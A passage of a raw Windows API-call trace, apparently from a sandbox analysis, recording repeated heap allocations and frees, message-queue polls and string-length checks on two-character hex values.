0x2a6a7c8 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2910 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2730 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27f0 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29b8 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28f8 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2748 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27f0 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29b8 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2730 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.611] lstrlenW (lpString="65") returned 2 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28f8 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2748 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2910 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29b8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2898 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29b8 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.612] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.612] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27c0 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26d0 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2790 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27d8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27f0 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2808 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2730 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2940 [0083.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27f0 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2808 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27d8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.613] lstrlenW (lpString="6C") returned 2 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2730 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2940 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2790 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2988 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27d8 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26d0 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27c0 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27d8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2988 | out: hHeap=0x2af0000) returned 1 [0083.613] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.613] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27d8 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2910 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2940 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2988 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27c0 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a908 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26d0 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27c0 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2988 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.614] lstrlenW (lpString="5C") returned 2 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26d0 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2940 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2910 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27a8 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27d8 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27a8 | out: hHeap=0x2af0000) returned 1 [0083.614] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.614] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2910 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28c8 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27f0 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2700 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0083.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27f0 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28c8 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.615] lstrlenW (lpString="44") returned 2 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2700 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2910 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2880 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2880 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.616] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.616] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28c8 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2940 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2880 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2808 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2820 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0083.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28e0 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2880 | out: hHeap=0x2af0000) returned 1 [0083.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2940 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2808 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28c8 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.617] lstrlenW (lpString="65") returned 2 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2820 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28e0 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2820 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2820 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.617] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.617] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2898 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2748 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2790 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26d0 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2940 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2910 [0083.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 